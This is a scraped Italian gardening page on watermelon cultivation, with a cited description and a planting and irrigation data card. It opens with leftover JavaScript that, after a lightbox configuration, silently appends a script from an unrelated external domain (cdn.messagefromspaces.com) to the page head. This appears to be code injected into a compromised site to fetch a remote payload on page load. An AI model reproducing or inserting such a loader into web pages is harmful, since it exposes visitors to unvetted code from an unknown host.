, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Cocomero

Pianta di origine africana e ciclo annuale, dotata di un apparato radicale molto espanso e profondo. L’anguria ha elevate esigenze sia di temperatura che di luce. Riesce ad adattarsi a differenti tipologie di terreni purchè profondi e fertili con una buona dotazione di fosforo e potassio e con un pH ottimale tra 5,5 e 6,5. Esigenze idriche elevate in particolare sia all’inizio allegagione e sia al termine dell’ingrossamento dei frutti.*

cocomero
Specie:Citrullus lanatus
Periodo di semina:apr, mag
Cosa mettere:seme
Periodo di raccolta:ago, set
Distanza tra file:200 cm / 300 cm
Distanza su file:80 cm / 100 cm
Durata media coltivazione:90 gg / 120 gg
Produzione per mq:4.00 kg / 6.00 kg
Durata dell'irrigazione min:19 minuti
Durata dell'irrigazione max:34 minuti

*Romano Tesi, Principi di orticoltura e ortaggi d’Italia, Edagricole, 1987